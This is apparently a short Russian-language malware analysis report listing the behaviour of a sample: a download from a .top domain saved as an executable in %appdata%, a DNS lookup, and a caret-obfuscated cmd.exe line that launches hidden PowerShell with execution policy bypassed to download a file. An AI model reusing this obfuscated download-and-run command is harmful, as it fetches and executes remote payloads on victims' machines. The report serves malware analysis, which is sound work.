Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^wERs^heLl.^e^X^E -Exec^u^T^IoN^POlicy ^by^p^Ass -NoProFiL^E -wIn^Do^ws^TyLe ^hiD^D^EN (N^EW-Ob^je^ct^ sY^Ste^M.NEt.wEBCl^IENT).^Downl^o^A^DFILe^('http://newyeargoka.top/r...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "P^O^wERs^heLl.^e^X^E -Exec^u^T^IoN^POlicy ^by^p^Ass -NoProFiL^E -wIn^Do^ws^TyLe ^hiD^D^EN (N^EW-Ob^je^ct^ sY^Ste^M.NEt.wEBCl^IENT).^Downl^o^A^DFILe^('http://newyeargoka.top/r...' (со скрытым окном)